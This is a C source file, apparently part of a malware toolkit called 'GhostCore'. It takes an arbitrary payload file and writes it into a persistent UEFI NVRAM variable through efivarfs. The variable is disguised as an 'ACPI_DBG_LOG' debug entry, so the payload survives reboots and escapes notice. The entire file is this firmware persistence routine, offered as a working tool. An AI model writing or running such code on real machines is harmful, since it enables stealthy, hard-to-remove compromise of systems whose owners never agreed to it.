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ghostcore_nvram_writer.c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&lt;sys/stat.h&gt;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&lt;errno.h&gt;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VAR_NAME "ACPI_DBG_LOG-4d1ede05-38c7-4a6a-9cc6-4bcca8b38c14"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EFIVARS_PATH "/sys/firmware/efi/efivars/" VAR_NAME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(argc != 2)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fprintf(stderr, "Usage: %s &lt;payload file&gt;\n", argv[0]);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const char *payload_path = argv[1];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FILE *fp = fopen(payload_path, "rb");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(!fp)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perror("Failed to open payload file");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Read payload into memory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fseek(fp, 0, SEEK_END);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size_t fsize = ftell(fp);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rewind(fp);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unsigned char *payload = malloc(fsize + 4);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(!payload)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fclose(fp);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perror("Memory error");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fread(payload + 4, 1, fsize, fp);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Attributes: 07 00 00 00 =&gt; EFI_VARIABLE_NON_VOLATILE | BOOTSERVICE_ACCESS | RUNTIME_ACCESS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payload[0] = 0x07;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payload[1] = 0x00;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payload[2] = 0x00;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payload[3] = 0x00;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Write to efivarfs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fd = open(EFIVARS_PATH, O_WRONLY | O_CREAT, 0644);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(fd &lt; 0)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perror("Failed to open EFI variable path (maybe run as root?)");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(write(fd, payload, fsize + 4) != fsize + 4)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perror("Failed to write EFI variable");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close(fd);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printf("🔥 GhostCore payload written to NVRAM as %s\n", VAR_NAME);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close(fd);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free(payload);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